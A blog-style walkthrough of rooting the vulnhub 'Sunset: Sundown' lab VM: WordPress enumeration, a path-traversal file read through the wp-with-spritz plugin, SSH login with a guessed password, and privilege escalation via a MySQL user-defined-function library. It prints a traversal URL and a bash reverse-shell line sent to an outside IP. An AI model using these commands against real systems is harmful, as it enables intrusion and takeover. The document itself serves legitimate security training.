How to hack: Sundown CTF — vulnhub walkthrough

This week I’ll go over the steps to get root access on this VM.

As always we get it from vulnhub: https://www.vulnhub.com/entry/sunset-sundown,530/, this one was created by @whitecr0wz, whom is responsible for some very interesting VM’s.

First we’ll need to figure out where the machine is, so a netdiscover will find it after a couple of seconds:

netdiscover -i eth0 -r 192.168.0.0/24

192.168.0.155 will be my victim IP

Now that we have the target identified, we’ll proceed to enumerate the services running on it via nmap:

SSH and HTTP open

I don’t have enough data to attempt SSH so I’ll go after HTTP first and reading the first line will reveal it’s Wordpress:

The theme is one of wordpress default themes, which most likely won’t have any exploits, so I will limit the scope of WPScan to only users/plugin’s:

wpscan — url http://192.168.0.155 -e ap,u

This will report that only the “admin” user exists and one plug-in is installed: wp-with-spritz; Searching for it on exploit-db will show one RFI exploit:

https://www.exploit-db.com/exploits/44544

Remote file inclusion will give us read-only access to the server, so it will mostly be used to search for another entry point to it.

Following the PoC we go after the /etc/passwd file and find a user “carlos”:

Before moving on, I tried some other useful paths like:
/home/carlos/.ssh/id_rsa
/root/.ssh/id_rsa
etc…

they didn’t work but it was worth a shot.

Since the site is Wordpress I’ll use our exploit to extract it’s config (I use the source view on firefox, just in case there is some html that could break or hide data)

view-source:http://192.168.0.155/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=../../../wp-config.php

From here we can salvage the user/password for mysql, the rest is boilerplate stuff what won’t be much use (salt could be helpful to create a WP admin user).

We know there is a carlos user that we could attempt via SSH, I try using the db password and it didn’t work, I then tried carlos/carlos and that worked!

There’s the first flag

Now that I am in, I’ll run LinEnum (https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh) to find anything outstanding that I can use.

After a long long long while of reading through the report I notice that mysql is being reported as a super user account:

That is not OK, I go back and check the /etc/passwd file and I hadn’t noticed that the first time:

And since WP gave us the root password for mysql, we now know where our attack vector is!

A quick google for “mysql privilege escalation” lands me on this site:

Which has a similar scenario of entering via a misconfigured WP instance.

How this exploit works is that since MySQL is running as root, I can write any file with those permissions when doing a “dump to file”, which can be text or binary, I went back to the RFI url and checked if there was already a sudoers file, because there is one and MySQL doesn’t overwrite files I’ll take the longer route from the recipe, which is to load a plugin that will run a command (as root in our case), I’ll proceed to download the .so file for 64 bit linux then from my computer do an scp to the VM

scp lib_mysqludf_sys.so carlos@192.168.0.155:/home/carlos/

Now I’ll run the mysql commands to load the data from the .so to a table then write it to the plugin folder, which the guide has a path but that is for MySQL, this one is using the MariaDB fork, so I use:

SHOW VARIABLES LIKE '%plugin%';

To find the actual path:

Then I’ll adjust the queries for that path.

potato table name is optional

When loading the plugin I get an elf header error:

Reading a bit more on the exploit I find out that metasploit supports it already and it has a payload (https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql), so I’ll use their version instead, using the same steps i just named the so different with a _64 at the end, and since mysql doesn’t overwrite files I had to commit to that new filename everywhere.

The last step would be to run a reverse shell here:

select sys_exec(‘bash -i >& /dev/tcp/192.168.1.99/443 0>&1’);

but that is too easy, so to give it a small twist (and to not publish my IP to the victim 😮) , I create a sudoers file in the carlos home folder but I give carlos SUDO permissions:

Then in mysql I just replace the current file with my version and sudo su:

We are now root!

Now we cd to home and find our beautiful flag waiting for us!

I have no idea what the ASCII Art is…

Now we know why we shouldn’t run mysql (or anything) as root!